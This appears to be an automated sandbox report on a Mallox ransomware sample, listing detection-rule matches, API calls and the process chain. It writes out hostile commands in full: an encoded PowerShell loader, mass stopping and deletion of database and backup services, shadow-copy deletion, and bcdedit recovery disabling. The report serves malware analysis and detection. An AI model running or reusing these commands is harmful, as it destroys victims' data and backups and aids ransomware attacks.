8e974a3be94b7748f7971f278160a74d738d5cab2c3088b1492cfbbd05e83e22, modification_date = 2023-05-24, id = 7e2edc94-26e4-4024-8bc0-8e90d76f5a96
        Source: 10.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: ransomware_mallox hash5 = 77fdce66e7f909300e4493cbe7055254f7992ba65f9b7445a6755d0dbd9f80a5, hash4 = 4db69a0643f6ec795e5450a0563605e91293f233aa60715ae09ed8effa3b7267, hash3 = 4075d6e02c022ee45e0cd1c826abf749200639ee8ebc42375dac2430abafb5d6, hash2 = 3f843cbffeba010445dae2b171caaa99c6b56360de5407da71210d007fe26673, hash1 = 2a549489e2455a2d84295604e29c727dd20d65f5a874209840ce187c35d9a439, author = Sekoia.io, description = Rule to detect mallox ransomware samples., creation_date = 2023-02-20, classification = TLP:CLEAR, hash9 = e7e00e0f817fcb305f82aec2e60045fcdb1b334b2621c09133b6b81284002009, hash8 = df64e87ecb30f4cadf54f2c1b3d3cba8cc2d315db0fd4af2d11add57baa56f6a, version = 1.0, hash7 = a5085e571857ec54cf9625050dfc29a195dad4d52bea9b69d3f22e33ed636525, hash6 = 8e974a3be94b7748f7971f278160a74d738d5cab2c3088b1492cfbbd05e83e22, modification_date = 2023-05-24, id = 7e2edc94-26e4-4024-8bc0-8e90d76f5a96
        Source: 4.2.R1TftmQpuQ.bat.exe.5d12868.2.raw.unpack, type: UNPACKEDPEMatched rule: ransomware_mallox hash5 = 77fdce66e7f909300e4493cbe7055254f7992ba65f9b7445a6755d0dbd9f80a5, hash4 = 4db69a0643f6ec795e5450a0563605e91293f233aa60715ae09ed8effa3b7267, hash3 = 4075d6e02c022ee45e0cd1c826abf749200639ee8ebc42375dac2430abafb5d6, hash2 = 3f843cbffeba010445dae2b171caaa99c6b56360de5407da71210d007fe26673, hash1 = 2a549489e2455a2d84295604e29c727dd20d65f5a874209840ce187c35d9a439, author = Sekoia.io, description = Rule to detect mallox ransomware samples., creation_date = 2023-02-20, classification = TLP:CLEAR, hash9 = e7e00e0f817fcb305f82aec2e60045fcdb1b334b2621c09133b6b81284002009, hash8 = df64e87ecb30f4cadf54f2c1b3d3cba8cc2d315db0fd4af2d11add57baa56f6a, version = 1.0, hash7 = a5085e571857ec54cf9625050dfc29a195dad4d52bea9b69d3f22e33ed636525, hash6 = 8e974a3be94b7748f7971f278160a74d738d5cab2c3088b1492cfbbd05e83e22, modification_date = 2023-05-24, id = 7e2edc94-26e4-4024-8bc0-8e90d76f5a96
        Source: 10.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: ransomware_mallox hash5 = 77fdce66e7f909300e4493cbe7055254f7992ba65f9b7445a6755d0dbd9f80a5, hash4 = 4db69a0643f6ec795e5450a0563605e91293f233aa60715ae09ed8effa3b7267, hash3 = 4075d6e02c022ee45e0cd1c826abf749200639ee8ebc42375dac2430abafb5d6, hash2 = 3f843cbffeba010445dae2b171caaa99c6b56360de5407da71210d007fe26673, hash1 = 2a549489e2455a2d84295604e29c727dd20d65f5a874209840ce187c35d9a439, author = Sekoia.io, description = Rule to detect mallox ransomware samples., creation_date = 2023-02-20, classification = TLP:CLEAR, hash9 = e7e00e0f817fcb305f82aec2e60045fcdb1b334b2621c09133b6b81284002009, hash8 = df64e87ecb30f4cadf54f2c1b3d3cba8cc2d315db0fd4af2d11add57baa56f6a, version = 1.0, hash7 = a5085e571857ec54cf9625050dfc29a195dad4d52bea9b69d3f22e33ed636525, hash6 = 8e974a3be94b7748f7971f278160a74d738d5cab2c3088b1492cfbbd05e83e22, modification_date = 2023-05-24, id = 7e2edc94-26e4-4024-8bc0-8e90d76f5a96
        Source: 4.2.R1TftmQpuQ.bat.exe.5e5bd78.4.raw.unpack, type: UNPACKEDPEMatched rule: ransomware_mallox hash5 = 77fdce66e7f909300e4493cbe7055254f7992ba65f9b7445a6755d0dbd9f80a5, hash4 = 4db69a0643f6ec795e5450a0563605e91293f233aa60715ae09ed8effa3b7267, hash3 = 4075d6e02c022ee45e0cd1c826abf749200639ee8ebc42375dac2430abafb5d6, hash2 = 3f843cbffeba010445dae2b171caaa99c6b56360de5407da71210d007fe26673, hash1 = 2a549489e2455a2d84295604e29c727dd20d65f5a874209840ce187c35d9a439, author = Sekoia.io, description = Rule to detect mallox ransomware samples., creation_date = 2023-02-20, classification = TLP:CLEAR, hash9 = e7e00e0f817fcb305f82aec2e60045fcdb1b334b2621c09133b6b81284002009, hash8 = df64e87ecb30f4cadf54f2c1b3d3cba8cc2d315db0fd4af2d11add57baa56f6a, version = 1.0, hash7 = a5085e571857ec54cf9625050dfc29a195dad4d52bea9b69d3f22e33ed636525, hash6 = 8e974a3be94b7748f7971f278160a74d738d5cab2c3088b1492cfbbd05e83e22, modification_date = 2023-05-24, id = 7e2edc94-26e4-4024-8bc0-8e90d76f5a96
        Source: 4.2.R1TftmQpuQ.bat.exe.5b0da48.3.raw.unpack, type: UNPACKEDPEMatched rule: ransomware_mallox hash5 = 77fdce66e7f909300e4493cbe7055254f7992ba65f9b7445a6755d0dbd9f80a5, hash4 = 4db69a0643f6ec795e5450a0563605e91293f233aa60715ae09ed8effa3b7267, hash3 = 4075d6e02c022ee45e0cd1c826abf749200639ee8ebc42375dac2430abafb5d6, hash2 = 3f843cbffeba010445dae2b171caaa99c6b56360de5407da71210d007fe26673, hash1 = 2a549489e2455a2d84295604e29c727dd20d65f5a874209840ce187c35d9a439, author = Sekoia.io, description = Rule to detect mallox ransomware samples., creation_date = 2023-02-20, classification = TLP:CLEAR, hash9 = e7e00e0f817fcb305f82aec2e60045fcdb1b334b2621c09133b6b81284002009, hash8 = df64e87ecb30f4cadf54f2c1b3d3cba8cc2d315db0fd4af2d11add57baa56f6a, version = 1.0, hash7 = a5085e571857ec54cf9625050dfc29a195dad4d52bea9b69d3f22e33ed636525, hash6 = 8e974a3be94b7748f7971f278160a74d738d5cab2c3088b1492cfbbd05e83e22, modification_date = 2023-05-24, id = 7e2edc94-26e4-4024-8bc0-8e90d76f5a96
        Source: 0000000A.00000002.3352660779.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: ransomware_mallox hash5 = 77fdce66e7f909300e4493cbe7055254f7992ba65f9b7445a6755d0dbd9f80a5, hash4 = 4db69a0643f6ec795e5450a0563605e91293f233aa60715ae09ed8effa3b7267, hash3 = 4075d6e02c022ee45e0cd1c826abf749200639ee8ebc42375dac2430abafb5d6, hash2 = 3f843cbffeba010445dae2b171caaa99c6b56360de5407da71210d007fe26673, hash1 = 2a549489e2455a2d84295604e29c727dd20d65f5a874209840ce187c35d9a439, author = Sekoia.io, description = Rule to detect mallox ransomware samples., creation_date = 2023-02-20, classification = TLP:CLEAR, hash9 = e7e00e0f817fcb305f82aec2e60045fcdb1b334b2621c09133b6b81284002009, hash8 = df64e87ecb30f4cadf54f2c1b3d3cba8cc2d315db0fd4af2d11add57baa56f6a, version = 1.0, hash7 = a5085e571857ec54cf9625050dfc29a195dad4d52bea9b69d3f22e33ed636525, hash6 = 8e974a3be94b7748f7971f278160a74d738d5cab2c3088b1492cfbbd05e83e22, modification_date = 2023-05-24, id = 7e2edc94-26e4-4024-8bc0-8e90d76f5a96
        Source: Process Memory Space: R1TftmQpuQ.bat.exe PID: 5664, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
        Source: classification engineClassification label: mal100.rans.spyw.evad.winBAT@353/1042@2/4
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_0040451B GetCurrentThread,OpenThreadToken,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,10_2_0040451B
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_00405D2B wnsprintfA,SleepEx,GetLogicalDrives,wnsprintfA,GetDiskFreeSpaceExA,GetComputerNameA,GetLocaleInfoA,GetNativeSystemInfo,wnsprintfA,UrlEscapeA,wnsprintfW,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,wnsprintfA,wnsprintfA,wnsprintfA,CreateFileW,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,wnsprintfA,wnsprintfA,UrlUnescapeA,wnsprintfA,WriteFile,CloseHandle,10_2_00405D2B
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: GetModuleFileNameW,wnsprintfW,wnsprintfW,CopyFileW,OpenSCManagerW,CreateServiceW,GetLastError,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,10_2_00404C3D
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_004061A1 CreateToolhelp32Snapshot,Process32NextW,lstrcmpW,OpenProcess,TerminateProcess,CloseHandle,Process32NextW,CloseHandle,10_2_004061A1
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_00404C3D GetModuleFileNameW,wnsprintfW,wnsprintfW,CopyFileW,OpenSCManagerW,CreateServiceW,GetLastError,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,10_2_00404C3D
        Source: C:\Windows\System32\cmd.exeFile created: C:\Users\user\Desktop\R1TftmQpuQ.bat.exeJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7184:120:WilError_03
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5376:120:WilError_03
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5636:120:WilError_03
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:420:120:WilError_03
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7732:120:WilError_03
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5068:120:WilError_03
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7500:120:WilError_03
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7916:120:WilError_03
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1708:120:WilError_03
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7132:120:WilError_03
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1804:120:WilError_03
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7296:120:WilError_03
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3884:120:WilError_03
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5332:120:WilError_03
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2632:120:WilError_03
        Source: C:\Users\user\Desktop\R1TftmQpuQ.bat.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nuy4k2he.4bu.ps1Jump to behavior
        Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\R1TftmQpuQ.bat" "
        Source: C:\Windows\System32\attrib.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = &quot;sqlwriter.exe&quot;)
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = &quot;FileZilla Server.exe&quot;)
        Source: C:\Windows\SysWOW64\cmd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = &quot;igfxHK.exe&quot;)
        Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = &quot;DataCollectorSvc.exe&quot;)
        Source: C:\Windows\SysWOW64\cmd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = &quot;ssclient.exe&quot;)
        Source: C:\Windows\SysWOW64\sc.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = &quot;BackupExec.exe&quot;)
        Source: C:\Windows\SysWOW64\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = &quot;Veeam.Backup.Agent.ConfigurationService.exe&quot;)
        Source: C:\Windows\SysWOW64\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = &quot;CasLicenceServer.exe&quot;)
        Source: C:\Windows\SysWOW64\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = &quot;Veeam.Backup.BrokerService.exe&quot;)
        Source: C:\Windows\SysWOW64\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = &quot;VeeamTransportSvc.exe&quot;)
        Source: C:\Windows\SysWOW64\net.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = &quot;sqlbrowser.exe&quot;)
        Source: C:\Windows\SysWOW64\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = &quot;Tomcat7w.exe&quot;)
        Source: C:\Windows\SysWOW64\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = &quot;DDSoftPwsTomcat9.exe&quot;)
        Source: C:\Windows\SysWOW64\net1.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = &quot;iexplore.exe&quot;)
        Source: C:\Windows\SysWOW64\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = &quot;Veeam.Backup.CatalogDataService.exe&quot;)
        Source: C:\Windows\SysWOW64\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = &quot;UFSoft.U8.OC.QuartzScheduler.exe&quot;)
        Source: C:\Windows\SysWOW64\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = &quot;ReportingServicesService.exe&quot;)
        Source: C:\Windows\SysWOW64\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = &quot;U8SmartClient.exe&quot;)
        Source: C:\Windows\SysWOW64\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = &quot;Veeam.Backup.CloudService.exe&quot;)
        Source: C:\Users\user\Desktop\R1TftmQpuQ.bat.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
        Source: C:\Users\user\Desktop\R1TftmQpuQ.bat.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
        Source: R1TftmQpuQ.batReversingLabs: Detection: 34%
        Source: R1TftmQpuQ.batVirustotal: Detection: 45%
        Source: C:\Users\user\Desktop\R1TftmQpuQ.bat.exeFile read: C:\Users\user\Desktop\R1TftmQpuQ.batJump to behavior
        Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\R1TftmQpuQ.bat" "
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\attrib.exe attrib +s +h "C:\Users\user\Desktop\R1TftmQpuQ.bat".exe
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\Desktop\R1TftmQpuQ.bat.exe "C:\Users\user\Desktop\R1TftmQpuQ.bat".exe -wIn 1 -enC JABlAHgAZQAgAD0AIABbAFMAeQBzAHQAZQBtAC4ARABpAGEAZwBuAG8AcwB0AGkAYwBzAC4AUAByAG8AYwBlAHMAcwBdADoAOgBHAGUAdABDAHUAcgByAGUAbgB0AFAAcgBvAGMAZQBzAHMAKAApAC4ATQBhAGkAbgBNAG8AZAB1AGwAZQAuAEYAaQBsAGUATgBhAG0AZQA7ACAAJABsAGUAbgAgAD0AIAAkAGUAeABlAC4ATABlAG4AZwB0AGgAOwAkAGwAZQBuACAAPQAgACQAbABlAG4AIAAtACAANAA7ACQAVwBlAGIAVABpAHQAbABlACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAFQAeQBwAGUATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAFMAdAByAGkAbgBnAEIAdQBpAGwAZABlAHIAOwAgAGYAbwByAGUAYQBjAGgAIAAoACQAbABpAG4AZQAgAGkAbgAgAFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQATABpAG4AZQBzACgAJABlAHgAZQAuAFIAZQBtAG8AdgBlACgAJABsAGUAbgApACkAKQAgAHsAIABpAGYAIAAoACQAbABpAG4AZQAgAC0AbABpAGsAZQAgACcAKgAgAK4AKgAnACkAIAB7ACAAIAAkAFcAZQBiAFQAaQB0AGwAZQAuAEEAcABwAGUAbgBkACgAJABsAGkAbgBlAC4AUwBwAGwAaQB0ACgAJwCuACcAKQBbADEAXQApACAAfAAgAE8AdQB0AC0ATgB1AGwAbAB9ACAAfQA7ACAAJABiAHkAdABlAHMAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAVwBlAGIAVABpAHQAbABlAC4AVABvAFMAdAByAGkAbgBnACgAKQApADsAJABpAG4AcAB1AHQAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ASQBPAC4ATQBlAG0AbwByAHkAUwB0AHIAZQBhAG0AKAAgACwAIAAkAGIAeQB0AGUAcwAgACkAOwAkAG8AdQB0AHAAdQB0ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtADsAJABnAHoAaQBwAFMAdAByAGUAYQBtACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEcAegBpAHAAUwB0AHIAZQBhAG0AIAAkAGkAbgBwAHUAdAAsACAAKABbAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgBNAG8AZABlAF0AOgA6AEQAZQBjAG8AbQBwAHIAZQBzAHMAKQA7ACQAZwB6AGkAcABTAHQAcgBlAGEAbQAuAEMAbwBwAHkAVABvACgAIAAkAG8AdQB0AHAAdQB0ACAAKQA7ACQAZwB6AGkAcABTAHQAcgBlAGEAbQAuAEMAbABvAHMAZQAoACkAOwAkAGkAbgBwAHUAdAAuAEMAbABvAHMAZQAoACkAOwBbAGIAeQB0AGUAWwBdAF0AIAAkAGIAeQB0AGUAcwAgAD0AIAAkAG8AdQB0AHAAdQB0AC4AVABvAEEAcgByAGEAeQAoACkAOwBbAEEAcgByAGEAeQBdADoAOgBSAGUAdgBlAHIAcwBlACgAJABiAHkAdABlAHMAKQA7ACAAJABhAHMAcwBlAG0AYgBsAHkAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZAAoACQAYgB5AHQAZQBzACkAOwAgACQAZQBuAHQAcgB5AFAAbwBpAG4AdABNAGUAdABoAG8AZAAgAD0AIAAkAGEAcwBzAGUAbQBiAGwAeQAuAEcAZQB0AFQAeQBwAGUAcwAoACkALgBXAGgAZQByAGUAKAB7ACAAJABfAC4ATgBhAG0AZQAgAC0AZQBxACAAJwBXAHIAZwB2AGcAcAByACcAIAB9ACwAIAAnAEYAaQByAHMAdAAnACkALgBHAGUAdABNAGUAdABoAG8AZAAoACcATQBhAGkAbgAnACwAIABbAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBCAGkAbgBkAGkAbgBnAEYAbABhAGcAcwBdACAAJwBTAHQAYQB0AGkAYwAsACAAUAB1AGIAbABpAGMALAAgAE4AbwBuAFAAdQBiAGwAaQBjACcAKQA7ACAAJABlAG4AdAByAHkAUABvAGkAbgB0AE0AZQB0AGgAbwBkAC4ASQBuAHYAbwBrAGUAKAAkAG4AdQBsAGwALAAgACQAbgB1AGwAbAApACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA=
        Source: C:\Users\user\Desktop\R1TftmQpuQ.bat.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMgAwAA==
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Users\user\Desktop\R1TftmQpuQ.bat.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\Bwmeldokiller.bat" "
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Users\user\Desktop\R1TftmQpuQ.bat.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c "color b & net stop "SQLSERVERAGENT" & net stop "SQLBrowser" & net stop "SQLTELEMETRY" & net stop "MsDtsServer130" & net stop "SSISTELEMETRY130" & net stop "SQLWrite" & net stop "MSSQL$VEEAMSQL2012" & net stop "SQLAgent$VEEAMSQL2012" & net stop "MSSQL" & net stop "SQLAgent" & net stop "MSSQLServerADHelper100" & net stop "MSSQLServerOLAPService" & net stop "MsDtsServer100" & net stop "ReportServer" & net stop "SQLTELEMETRY$HL" & net stop "TMBMServer" & net stop "MSSQL$PROGID" & net stop "MSSQL$WOLTERSKLUWER" & net stop "SQLAgent$PROGID" & net stop "SQLAgent$WOLTERSKLUWER" & net stop "MSSQLFDLauncher$OPTIMA" & net stop "MSSQL$OPTIMA" & net stop "SQLAgent$OPTIMA" & net stop "ReportServer$OPTIMA" & net stop "msftesql$SQLEXPRESS" & net stop "postgresql-x64-9.4" & sc config "MSSQLFDLauncher" start= disabled & sc config "SQLSERVERAGENT" start= disabled & sc config "SQLBrowser" start= disabled"
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess created: C:\Windows\System32\vssadmin.exe "C:\Windows\sysnative\vssadmin.exe" delete shadows /all /quiet
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C sc delete "MSSQLFDLauncher"&&sc delete "MSSQLSERVER"&&sc delete "SQLSERVERAGENT"&&sc delete "SQLBrowser"&&sc delete "SQLTELEMETRY"&&sc delete "MsDtsServer130"&&sc delete "SSISTELEMETRY130"&&sc delete "SQLWriter"&&sc delete "MSSQL$VEEAMSQL2012"&&sc delete "SQLAgent$VEEAMSQL2012"&&sc delete "MSSQL"&&sc delete "SQLAgent"&&sc delete "MSSQLServerADHelper100"&&sc delete "MSSQLServerOLAPService"&&sc delete "MsDtsServer100"&&sc delete "ReportServer"&&sc delete "SQLTELEMETRY$HL"&&sc delete "TMBMServer"&&sc delete "MSSQL$PROGID"&&sc delete "MSSQL$WOLTERSKLUWER"&&sc delete "SQLAgent$PROGID"&&sc delete "SQLAgent$WOLTERSKLUWER"&&sc delete "MSSQLFDLauncher$OPTIMA"&&sc delete "MSSQL$OPTIMA"&&sc delete "SQLAgent$OPTIMA"&&sc delete "ReportServer$OPTIMA"&&sc delete "msftesql$SQLEXPRESS"&&sc delete "postgresql-x64-9.4"&&rem Kill "SQL"&&taskkill -f -im sqlbrowser.exe&&taskkill -f -im sqlwriter.exe&&taskkill -f -im sqlservr.exe&&taskkill -f -im msmdsrv.exe&&taskkill -f -im MsDtsSrvr.exe&&taskkill -f -im sqlceip.exe&&taskkill -f -im fdlauncher.exe&&taskkill -f -im Ssms.exe&&taskkill -f -im SQLAGENT.EXE&&taskkill -f -im fdhost.exe&&taskkill -f -im fdlauncher.exe&&taskkill -f -im sqlservr.exe&&taskkill -f -im ReportingServicesService.exe&&taskkill -f -im msftesql.exe&&taskkill -f -im pg_ctl.exe&&taskkill -f -im postgres.exe
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c bcdedit /set {current} bootstatuspolicy ignoreallfailures
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\System32\vssadmin.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c bcdedit /set {current} recoveryenabled no
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
